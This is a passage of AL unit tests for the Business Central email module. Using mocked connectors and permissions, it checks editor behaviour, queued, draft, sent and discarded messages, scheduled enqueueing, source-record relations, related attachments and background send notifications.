Assert.IsFalse(EmailEditor.SubjectField.Editable(), 'Subject field was editable');
Assert.IsFalse(EmailEditor.BodyField.Editable(), 'Body field was editable');
#if not CLEAN19
Assert.IsFalse(EmailEditor.Upload.Enabled(), 'Upload Action was not disabled.');
#else
Assert.IsFalse(EmailEditor.Attachments.Upload.Visible(), 'Upload Action is visible.');
#endif
Assert.IsFalse(EmailEditor.Send.Enabled(), 'Send Action was not disabled.');
EmailMessageAttachment.SetRange("Email Message Id", EmailMessage.GetId());
EmailMessageAttachment.FindFirst();
asserterror EmailMessageAttachment.Delete();
Assert.ExpectedError(EmailMessageQueuedCannotDeleteAttachmentErr);
end;
[Test]
[TransactionModel(TransactionModel::AutoRollback)]
procedure OpenMessageInEditorForAQueuedMessageOwnedByAnotherUserTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutBox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailEditor: TestPage "Email Editor";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailOutBox.Init();
EmailOutBox."Account Id" := TempAccount."Account Id";
EmailOutBox.Connector := Enum::"Email Connector"::"Test Email Connector";
EmailOutBox."Message Id" := EmailMessage.GetId();
EmailOutBox.Status := Enum::"Email Status"::Queued;
EmailOutbox."User Security Id" := 'd0a983f4-0fc8-4982-8e02-ee9294ab28da'; // Created by another user
EmailOutBox.Insert();
// Exercise/Verify
EmailEditor.Trap();
asserterror Email.OpenInEditor(EmailMessage);
Assert.ExpectedError(EmailMessageOpenPermissionErr);
end;
[Test]
procedure OpenSentMessageInEditorTest()
var
TempAccount: Record "Email Account" temporary;
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailEditor: TestPage "Email Editor";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
Email.Send(EmailMessage, TempAccount);
// Exercise/Verify
EmailEditor.Trap();
asserterror Email.OpenInEditor(EmailMessage);
Assert.ExpectedError(EmailMessageCannotBeEditedErr);
end;
[Test]
[HandlerFunctions('EmailEditorHandler,OnEmailEditorClose')]
procedure OpenInEditorModallyDiscardAOptionTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutbox: Record "Email Outbox";
SentEmail: Record "Sent Email";
Message: Record "Email Message";
Attachment: Record "Email Message Attachment";
Recipient: Record "Email Recipient";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailAction: Enum "Email Action";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
OptionChoice := 2; // Discard email
EmailAction := Email.OpenInEditorModally(EmailMessage, TempAccount);
// Exercise/Verify
// See EmailEditorHandler
// When the message was discarded, there should be no leftover records
Assert.AreEqual(Enum::"Email Action"::Discarded, EmailAction, 'Wrong email action returned');
Assert.IsFalse(EmailMessage.Get(EmailMessage.GetId()), 'The email message should not exist');
Assert.IsFalse(Message.Get(EmailMessage.GetId()), 'The email message record should not exist');
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(EmailOutbox.IsEmpty(), 'There should be no outbox to the discarded message');
SentEmail.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(SentEmail.IsEmpty(), 'There should be no sent email to the discarded message');
Recipient.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsTrue(Recipient.IsEmpty(), 'There should be no recipient to the discarded message');
Attachment.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsTrue(Attachment.IsEmpty(), 'There should be no attachments to the discarded message');
end;
[Test]
[HandlerFunctions('EmailEditorHandler,OnEmailEditorClose')]
procedure OpenInEditorModallySaveAsDraftOptionTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutbox: Record "Email Outbox";
SentEmail: Record "Sent Email";
Message: Record "Email Message";
Attachment: Record "Email Message Attachment";
Recipient: Record "Email Recipient";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailAction: Enum "Email Action";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
OptionChoice := 1; // Keep as draft
EmailAction := Email.OpenInEditorModally(EmailMessage, TempAccount);
// Exercise/Verify
// See EmailEditorHandler
// Exercise
// When the message was saved as draft (see OnEmailEditorClose)
// Verify
Assert.AreEqual(Enum::"Email Action"::"Saved As Draft", EmailAction, 'Wrong email action returned');
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email message should exist');
Assert.IsTrue(Message.Get(EmailMessage.GetId()), 'The email message record should exist');
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsFalse(EmailOutbox.IsEmpty(), 'There should be an outbox to the message');
SentEmail.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(SentEmail.IsEmpty(), 'There should be no sent email to the message');
Recipient.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsFalse(Recipient.IsEmpty(), 'There should be a recipient to the message');
Attachment.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsFalse(Attachment.IsEmpty(), 'There should be an attachment to the draft message');
end;
[Test]
[HandlerFunctions('SendEmailEditorHandler')]
procedure OpenInEditorModallySendActionTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutbox: Record "Email Outbox";
SentEmail: Record "Sent Email";
Message: Record "Email Message";
Attachment: Record "Email Message Attachment";
Recipient: Record "Email Recipient";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailAction: Enum "Email Action";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
EmailAction := Email.OpenInEditorModally(EmailMessage, TempAccount);
// Exercise
// See SendEmailEditorHandlers
// Verify
Assert.AreEqual(Enum::"Email Action"::Sent, EmailAction, 'Wrong email action returned');
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email message should exist');
Assert.IsTrue(Message.Get(EmailMessage.GetId()), 'The email message record should exist');
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(EmailOutbox.IsEmpty(), 'There should be no outbox to the message');
SentEmail.SetRange("Message Id", EmailMessage.GetId());
Assert.IsFalse(SentEmail.IsEmpty(), 'There should be a sent email to the message');
Recipient.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsFalse(Recipient.IsEmpty(), 'There should be a recipient to the message');
Attachment.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsFalse(Attachment.IsEmpty(), 'There should be an attachment to the sent message');
end;
[Test]
[HandlerFunctions('DiscardEmailEditorHandler,ConfirmYes')]
procedure OpenInEditorModallyDiscardActionTest()
var
TempAccount: Record "Email Account" temporary;
EmailOutbox: Record "Email Outbox";
SentEmail: Record "Sent Email";
Message: Record "Email Message";
Attachment: Record "Email Message Attachment";
Recipient: Record "Email Recipient";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
EmailAction: Enum "Email Action";
begin
// Initialize
ConnectorMock.Initialize();
ConnectorMock.AddAccount(TempAccount);
PermissionsMock.Set('Email Edit');
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
EmailAction := Email.OpenInEditorModally(EmailMessage, TempAccount);
// Exercise
// See DiscardEmailEditorHandler
// Verify
Assert.AreEqual(Enum::"Email Action"::Discarded, EmailAction, 'Wrong email action returned');
Assert.IsFalse(EmailMessage.Get(EmailMessage.GetId()), 'The email message should not exist');
Assert.IsFalse(Message.Get(EmailMessage.GetId()), 'The email message record should not exist');
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(EmailOutbox.IsEmpty(), 'There should be no outbox to the message');
SentEmail.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(SentEmail.IsEmpty(), 'There should be no sent email to the message');
Recipient.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsTrue(Recipient.IsEmpty(), 'There should be no recipient to the message');
Attachment.SetRange("Email Message Id", EmailMessage.GetId());
Assert.IsTrue(Attachment.IsEmpty(), 'There should be no attachment to the discarded message');
end;
[Test]
[Scope('OnPrem')]
[TransactionModel(TransactionModel::AutoRollback)]
procedure EnqueueExistingEmailTest()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
AccountId: Guid;
begin
// [Scenario] When enqueuing an existing email, it appears in the outbox
PermissionsMock.Set('Email Edit');
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(AccountId);
// [When] Enqueuing the email message with the email account
ClearLastError();
Email.Enqueue(EmailMessage, AccountId, Enum::"Email Connector"::"Test Email Connector");
// [Then] No error occurs
Assert.AreEqual('', GetLastErrorText(), 'There should be no errors when enqueuing an email.');
// [Then] The enqueued email should be the correct one
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(1, EmailOutbox.Count(), 'There should be only one enqueued message');
Assert.IsTrue(EmailOutbox.FindFirst(), 'The message should be queued');
Assert.AreEqual(AccountId, EmailOutbox."Account Id", 'The account should be set');
Assert.AreEqual(Enum::"Email Connector"::"Test Email Connector", EmailOutbox.Connector, 'The connector should be set');
Assert.AreEqual(EmailOutbox.Status::Queued, EmailOutbox.Status, 'The status should be ''Queued''');
Assert.AreEqual(UserSecurityId(), EmailOutbox."User Security Id", 'The user security ID should be the current user');
Assert.AreEqual(EmailMessage.GetSubject(), EmailOutbox.Description, 'The description does not match the email title');
Assert.AreEqual('', EmailOutbox."Error Message", 'The error message should be blank');
end;
[Test]
[Scope('OnPrem')]
[TransactionModel(TransactionModel::AutoRollback)]
procedure EnqueueScheduledEmailTest()
var
EmailOutbox: Record "Email Outbox";
ScheduleTasks: Record "Scheduled Task";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
AccountId: Guid;
DateTime: DateTime;
begin
// [Scenario] When enqueuing an email to be sent at a later date, it appears in the outbox and a task is scheduled
PermissionsMock.Set('Email Edit');
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(AccountId);
// [When] Enqueuing the email message with the email account
ScheduleTasks.DeleteAll();
ClearLastError();
DateTime := CreateDateTime(CalcDate('<+1D>', Today()), Time());
Email.Enqueue(EmailMessage, AccountId, Enum::"Email Connector"::"Test Email Connector", DateTime);
// [Then] No error occurs
Assert.AreEqual('', GetLastErrorText(), 'There should be no errors when enqueuing an email.');
// [Then] Job is enqueued
Assert.AreEqual(ScheduleTasks.Count, 1, 'Enqueue should only add one entry to scheduled tasks');
Assert.IsTrue(ScheduleTasks.FindFirst(), 'The job should be in scheduled tasks');
Assert.AreEqual(Format(ScheduleTasks."Not Before", 0, '<Day,2>-<Month,2>-<Year> <Hours24,2>.<Minutes,2>.<Seconds,2>'), Format(DateTime, 0, '<Day,2>-<Month,2>-<Year> <Hours24,2>.<Minutes,2>.<Seconds,2>'), 'The jobs not before date should be equal to the datetime provided when enqueueing');
// [Then] The enqueued email should be the correct one
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(1, EmailOutbox.Count(), 'There should be only one enqueued message');
Assert.IsTrue(EmailOutbox.FindFirst(), 'The message should be queued');
Assert.AreEqual(AccountId, EmailOutbox."Account Id", 'The account should be set');
Assert.AreEqual(Enum::"Email Connector"::"Test Email Connector", EmailOutbox.Connector, 'The connector should be set');
Assert.AreEqual(EmailOutbox.Status::Queued, EmailOutbox.Status, 'The status should be ''Queued''');
Assert.AreEqual(UserSecurityId(), EmailOutbox."User Security Id", 'The user security ID should be the current user');
Assert.AreEqual(EmailMessage.GetSubject(), EmailOutbox.Description, 'The description does not match the email title');
Assert.AreEqual('', EmailOutbox."Error Message", 'The error message should be blank');
Assert.AreEqual(DateTime, EmailOutbox."Date Sending", 'The date sending does not match the datetime provided when enqueueing');
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailMessageFailTest()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
Connector: Enum "Email Connector";
EmailStatus: Enum "Email Status";
AccountId: Guid;
begin
// [Scenario] When sending an email on the foreground and the process fails, an error is shown
PermissionsMock.Set('Email Edit');
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(AccountId);
// [When] Sending the email fails
ConnectorMock.FailOnSend(true);
Assert.IsFalse(Email.Send(EmailMessage, AccountId, Connector::"Test Email Connector"), 'Sending an email should have failed');
// [Then] The error is as expected
EmailOutbox.SetRange("Account Id", AccountId);
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(EmailOutbox.FindFirst(), 'The email outbox entry should exist');
Assert.AreEqual(Connector::"Test Email Connector".AsInteger(), EmailOutbox.Connector.AsInteger(), 'Wrong connector');
Assert.AreEqual(EmailStatus::Failed.AsInteger(), EmailOutbox.Status.AsInteger(), 'Wrong status');
Assert.AreEqual('Failed to send email', EmailOutbox."Error Message", 'Wrong error message');
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailMessageSuccessTest()
var
EmailOutbox: Record "Email Outbox";
EmailMessageAttachment: Record "Email Message Attachment";
SentEmail: Record "Sent Email";
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
Connector: Enum "Email Connector";
begin
// [Scenario] When successfully sending an email, a record is added to the Sent Emails table
PermissionsMock.Set('Email Edit');
// [Given] An email message and an email account
CreateEmail(EmailMessage);
EmailMessage.AddAttachment('Attachment1', 'text/plain', Base64Convert.ToBase64('Content'));
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
// [When] The email is Sent
Assert.IsTrue(Email.Send(EmailMessage, EmailAccount), 'Sending an email should have succeeded');
// [Then] There is a Sent Email record and no Outbox record
SentEmail.SetRange("Account Id", EmailAccount."Account Id");
SentEmail.SetRange("Message Id", EmailMessage.GetId());
Assert.IsTrue(SentEmail.FindFirst(), 'The email sent record should exist');
Assert.AreEqual(EmailMessage.GetId(), SentEmail."Message Id", 'Wrong email message');
Assert.AreEqual(EmailAccount."Email Address", SentEmail."Sent From", 'Wrong email address (sent from)');
Assert.AreNotEqual(0DT, SentEmail."Date Time Sent", 'The Date Time Sent should be filled');
Assert.AreEqual(EmailAccount."Account Id", SentEmail."Account Id", 'Wrong account');
Assert.AreEqual(Connector::"Test Email Connector".AsInteger(), SentEmail.Connector.AsInteger(), 'Wrong connector');
Assert.AreEqual(EmailMessage.GetSubject(), SentEmail.Description, 'Wrong description');
// There is no related outbox
EmailOutbox.SetRange("Account Id", EmailAccount."Account Id");
EmailOutbox.SetRange("Message Id", EmailMessage.GetId());
Assert.AreEqual(0, EmailOutbox.Count(), 'Email Outbox was not empty.');
// [Then] The attachments cannot be deleted
EmailMessageAttachment.SetRange("Email Message Id", EmailMessage.GetId());
EmailMessageAttachment.FindFirst();
asserterror EmailMessageAttachment.Delete();
Assert.ExpectedError(EmailMessageSentCannotDeleteAttachmentErr);
end;
[Test]
[Scope('OnPrem')]
procedure ShowSourceRecordInOutbox()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
Any: Codeunit Any;
EmailTest: Codeunit "Email Test";
EmailOutboxPage: Page "Email Outbox";
EmailOutboxTestPage: TestPage "Email Outbox";
TableId: Integer;
SystemId: Guid;
begin
BindSubscription(EmailTest);
PermissionsMock.Set('Email Edit');
// [Scenario] Emails with a source document show the Show Source Record action
// [Given] An Email with table id and source system id
TableId := Any.IntegerInRange(1, 10000);
SystemId := Any.GuidValue();
// [When] The email is created with the source record
CreateEmailWithSource(EmailMessage, TableId, SystemId);
// [And] The email is saved as draft
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [And] The Show Source Document button is visible
EmailOutboxTestPage.Trap();
EmailOutboxPage.SetRecord(EmailOutbox);
EmailOutboxPage.Run();
Assert.IsTrue(EmailOutboxTestPage.ShowSourceRecord.Visible(), 'Show Source Record action should be visible');
// [When] Show Source Document button is clicked
ClearLastError();
EmailOutboxTestPage.ShowSourceRecord.Invoke();
// [Then] No error appears
Assert.AreEqual('', GetLastErrorText, 'An error occurred');
end;
[Test]
[Scope('OnPrem')]
[HandlerFunctions('RelationPickerHandler')]
procedure ShowMultipleSourceRecords()
var
EmailOutbox: Record "Email Outbox";
EmailMessageRecord: Record "Email Message";
EmailMessage: Codeunit "Email Message";
EmailTest: Codeunit "Email Test";
EmailOutboxPage: Page "Email Outbox";
EmailOutboxTestPage: TestPage "Email Outbox";
TableId: Integer;
SystemId: Guid;
begin
BindSubscription(EmailTest);
EmailOutbox.DeleteAll();
// [Scenario] Emails with multiple source documents show the email relation picker
// [Given] An Email with table id and source system id
// [And] The email is with a source and saved as draft
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [When] An extra relation is added - We use email outbox to have a record that actually exists
EmailMessageRecord.Get(EmailMessage.GetId());
TableId := Database::"Email Outbox";
SystemId := EmailOutbox.SystemId;
Email.AddRelation(EmailMessage, TableId, SystemId, Enum::"Email Relation Type"::"Primary Source", Enum::"Email Relation Origin"::"Compose Context");
Email.AddRelation(EmailMessage, Database::"Email Message", EmailMessageRecord.SystemId, Enum::"Email Relation Type"::"Related Entity", Enum::"Email Relation Origin"::"Compose Context");
// [And] The Show Source Document button is clicked
EmailOutboxTestPage.Trap();
EmailOutboxPage.SetRecord(EmailOutbox);
EmailOutboxPage.Run();
Assert.IsTrue(EmailOutboxTestPage.ShowSourceRecord.Visible(), 'Show Source Record action should be visible');
Assert.IsTrue(EmailOutboxTestPage.ShowSourceRecord.Enabled(), 'Show Source Record action should be enabled');
EmailOutboxTestPage.ShowSourceRecord.Invoke();
// [Then] Email picker modal appears
end;
[Test]
[Scope('OnPrem')]
procedure EmailWithoutSourceInOutbox()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
EmailTest: Codeunit "Email Test";
EmailOutboxPage: Page "Email Outbox";
EmailOutboxTestPage: TestPage "Email Outbox";
begin
BindSubscription(EmailTest);
PermissionsMock.Set('Email Edit');
EmailOutbox.DeleteAll();
// [Scenario] Emails without a source record show the Show Source Record action as disabled
// [Given] An email without a related source record
// [When] The email is created and saved as draft
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [When] The Email Outbox page is opened.
EmailOutboxTestPage.Trap();
EmailOutboxPage.SetRecord(EmailOutbox);
EmailOutboxPage.Run();
// [Then] The Show Source action is visible and disabled.
Assert.IsTrue(EmailOutboxTestPage.ShowSourceRecord.Visible(), 'Show Source Record action should be visible');
Assert.IsFalse(EmailOutboxTestPage.ShowSourceRecord.Enabled(), 'Show Source Record action should be disabled');
end;
[Test]
[Scope('OnPrem')]
procedure EmailWithSourceNoSubscriber()
var
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
Any: Codeunit Any;
EmailOutboxPage: Page "Email Outbox";
EmailOutboxTestPage: TestPage "Email Outbox";
TableId: Integer;
SystemId: Guid;
begin
// [Scenario] Emails with a source document but no OnShowSource subscriber show the Show Source Record action as disabled
PermissionsMock.Set('Email Edit');
// [Given] An Email with table id and source system id
TableId := Any.IntegerInRange(1, 10000);
SystemId := Any.GuidValue();
// [When] An email is created with the source record
CreateEmailWithSource(EmailMessage, TableId, SystemId);
// [And] Another email is created and saved as draft
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [When] The Email Outbox page is opened.
EmailOutboxTestPage.Trap();
EmailOutboxPage.SetRecord(EmailOutbox);
EmailOutboxPage.Run();
// [Then] The Show Source action is visible and disabled.
Assert.IsTrue(EmailOutboxTestPage.ShowSourceRecord.Visible(), 'Show Source Record action should be visible');
Assert.IsFalse(EmailOutboxTestPage.ShowSourceRecord.Enabled(), 'Show Source Record action should be disabled');
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailMessageWithSourceTest()
var
TempSentEmail: Record "Sent Email" temporary;
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
Any: Codeunit Any;
SystemId: Guid;
TableId, NumberOfEmails, i : Integer;
MessageIds: List of [Guid];
begin
// [Scenario] When successfully sending an email with source, a record is added to the email source document table and sent emails table.
PermissionsMock.Set('Email Edit');
// [Given] An email with source and an email account
TableId := Any.IntegerInRange(1, 10000);
SystemId := Any.GuidValue();
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
NumberOfEmails := Any.IntegerInRange(2, 5);
for i := 1 to NumberOfEmails do begin
CreateEmailWithSource(EmailMessage, TableId, SystemId);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
MessageIds.Add(EmailMessage.GetId());
// [When] The email is Sent
Assert.IsTrue(Email.Send(EmailMessage, EmailAccount), 'Sending an email should have succeeded');
end;
Email.GetSentEmailsForRecord(TableId, SystemId, TempSentEmail);
for i := 1 to NumberOfEmails do begin
TempSentEmail.SetCurrentKey("Message Id");
TempSentEmail.SetRange("Message Id", MessageIds.Get(i));
Assert.AreEqual(1, TempSentEmail.Count(), 'Did not find the email in Sent Emails ');
end;
end;
[Test]
[Scope('OnPrem')]
[HandlerFunctions('RelatedAttachmentsHandler,CloseEmailEditorHandler')]
procedure AttachFromRelatedRecords()
var
EmailMessageAttachments: Record "Email Message Attachment";
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
EmailTest: Codeunit "Email Test";
Email: Codeunit Email;
EmailEditorPage: TestPage "Email Editor";
TableId: Integer;
SystemId: Guid;
SourceText: Text;
begin
BindSubscription(EmailTest);
VariableStorage.Clear();
// [Given] A created email
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [And] A related record to the email (in this case, the email is related to an email in the outbox)
TableId := Database::"Email Outbox";
SystemId := EmailOutbox.SystemId;
Email.AddRelation(EmailMessage, TableId, SystemId, Enum::"Email Relation Type"::"Primary Source", Enum::"Email Relation Origin"::"Compose Context");
SourceText := StrSubstNo('%1: %2', EmailOutbox.TableCaption(), Format(EmailOutbox.Id));
VariableStorage.Enqueue(SourceText);
// [When] Opening the Email Related Attachments page
EmailEditorPage.Trap();
Email.OpenInEditor(EmailMessage);
EmailEditorPage.Attachments.SourceAttachments.Invoke();
// [Then] Attachments added through the 'OnFindRelatedAttachments' event are displayed
// [And] A related attachment is added
// [Then] The related attachment is added as an attachment to the email
EmailMessageAttachments.SetRange("Email Message Id", EmailMessage.GetId());
EmailMessageAttachments.FindSet();
Assert.AreEqual(1, EmailMessageAttachments.Count(), 'Related attachment was not attached to the email.');
Assert.AreEqual('Attachment1', EmailMessageAttachments."Attachment Name", 'Wrong attachment was attached to email.');
AssertVariableStorageEmpty();
end;
[Test]
[Scope('OnPrem')]
procedure GetRelatedAttachmentsTest()
var
EmailRelatedAttachment: Record "Email Related Attachment";
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
EmailTest: Codeunit "Email Test";
Email: Codeunit Email;
EmailEditor: Codeunit "Email Editor";
TableId: Integer;
SystemId: Guid;
SourceText: Text;
begin
BindSubscription(EmailTest);
VariableStorage.Clear();
// [Given] A created email
CreateEmail(EmailMessage);
Email.SaveAsDraft(EmailMessage, EmailOutbox);
// [And] A related record to the email (in this case, the email is related to an email in the outbox)
TableId := Database::"Email Outbox";
SystemId := EmailOutbox.SystemId;
Email.AddRelation(EmailMessage, TableId, SystemId, Enum::"Email Relation Type"::"Primary Source", Enum::"Email Relation Origin"::"Compose Context");
SourceText := StrSubstNo('%1: %2', EmailOutbox.TableCaption(), Format(EmailOutbox.Id));
VariableStorage.Enqueue(SourceText);
EmailEditor.GetRelatedAttachments(EmailMessage.GetId(), EmailRelatedAttachment);
Assert.AreEqual(1, EmailRelatedAttachment.Count(), 'Wrong number of attachments.');
Assert.AreEqual('Attachment1', EmailRelatedAttachment."Attachment Name", 'Wrong attachment name');
end;
[Test]
[Scope('OnPrem')]
[HandlerFunctions('RelatedAttachmentsHandler,CloseEmailEditorHandler')]
procedure FailedAttachFromRelatedRecords()
var
EmailMessage: Codeunit "Email Message";
EmailTest: Codeunit "Email Test";
Email: Codeunit Email;
EmailEditorPage: TestPage "Email Editor";
begin
BindSubscription(EmailTest);
// [Given] A created email without source record
CreateEmail(EmailMessage);
// [When] Opening the Email Related Attachments page and getting related attachments
EmailEditorPage.Trap();
Email.OpenInEditor(EmailMessage);
asserterror EmailEditorPage.Attachments.SourceAttachments.Invoke();
// [Then] An error message is displayed
Assert.ExpectedError(NoRelatedAttachmentsErr);
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailInBackgroundSuccessTest()
var
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
TestClientType: Codeunit "Test Client Type Subscriber";
EmailTest: Codeunit "Email Test";
Variable: Variant;
Status: Boolean;
MessageID: Guid;
begin
// [Scenario] When sending the email in the background, an event is fired to notify about the status of the email
PermissionsMock.Set('Email Edit');
TestClientType.SetClientType(ClientType::Background);
BindSubscription(TestClientType);
BindSubscription(EmailTest);
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
// [When] The email is Sent
Email.Send(EmailMessage, EmailAccount);
// [Then] An event is fired to notify for the status of the email
EmailTest.DequeueVariable(Variable);
MessageID := Variable;
EmailTest.DequeueVariable(Variable);
Status := Variable;
// [Then] The event was fired once
EmailTest.AssertVariableStorageEmpty();
Assert.AreEqual(MessageID, EmailMessage.GetId(), 'A different Email was expected');
Assert.IsTrue(Status, 'The email should have been sent');
UnBindSubscription(EmailTest);
UnBindSubscription(TestClientType);
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailInBackgroundFailTest()
var
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
TestClientType: Codeunit "Test Client Type Subscriber";
EmailTest: Codeunit "Email Test";
Variable: Variant;
Status: Boolean;
MessageID: Guid;
begin
// [Scenario] When sending the email in the background, an event is fired to notify about the status of the email
PermissionsMock.Set('Email Edit');
TestClientType.SetClientType(ClientType::Background);
BindSubscription(TestClientType);
BindSubscription(EmailTest);
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
ConnectorMock.FailOnSend(true);
// [When] The email is Sent
Email.Send(EmailMessage, EmailAccount);
// [Then] An event is fired to notify for the status of the email
EmailTest.DequeueVariable(Variable);
MessageID := Variable;
EmailTest.DequeueVariable(Variable);
Status := Variable;
// [Then] The event was fired once
EmailTest.AssertVariableStorageEmpty();
Assert.AreEqual(MessageID, EmailMessage.GetId(), 'A different Email was expected');
Assert.IsFalse(Status, 'The email should not have been sent');
UnBindSubscription(EmailTest);
UnBindSubscription(TestClientType);
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailInBackgroundFailSubscriberFailsTest()
var
EmailAccount: Record "Email Account";
EmailMessage: Codeunit "Email Message";
ConnectorMock: Codeunit "Connector Mock";
TestClientType: Codeunit "Test Client Type Subscriber";
EmailTest: Codeunit "Email Test";
Variable: Variant;
Status: Boolean;
MessageID: Guid;
begin
// [Scenario] When an error occurs on the subscriber it does not propagate up the stack and the notification is sent only once
PermissionsMock.Set('Email Edit');
TestClientType.SetClientType(ClientType::Background);
BindSubscription(TestClientType);
BindSubscription(EmailTest);
EmailTest.ThrowErrorOnAfterSendEmail();
// [Given] An email message and an email account
CreateEmail(EmailMessage);
Assert.IsTrue(EmailMessage.Get(EmailMessage.GetId()), 'The email should exist');
ConnectorMock.Initialize();
ConnectorMock.AddAccount(EmailAccount);
ConnectorMock.FailOnSend(true);
// [When] The email is Sent
Email.Send(EmailMessage, EmailAccount);
// [Then] An event is fired to notify for the status of the email
EmailTest.DequeueVariable(Variable);
MessageID := Variable;
EmailTest.DequeueVariable(Variable);
Status := Variable;
// [Then] The event was fired once
EmailTest.AssertVariableStorageEmpty();
Assert.AreEqual(MessageID, EmailMessage.GetId(), 'A different Email was expected');
Assert.IsFalse(Status, 'The email should not have been sent');
UnBindSubscription(EmailTest);
UnBindSubscription(TestClientType);
end;
[Test]
[Scope('OnPrem')]
procedure SendEmailInBackgroundSuccessSubscriberFailsTest()
var
EmailAccount: Record "Email Account";
EmailOutbox: Record "Email Outbox";
EmailMessage: Codeunit "Email Message";
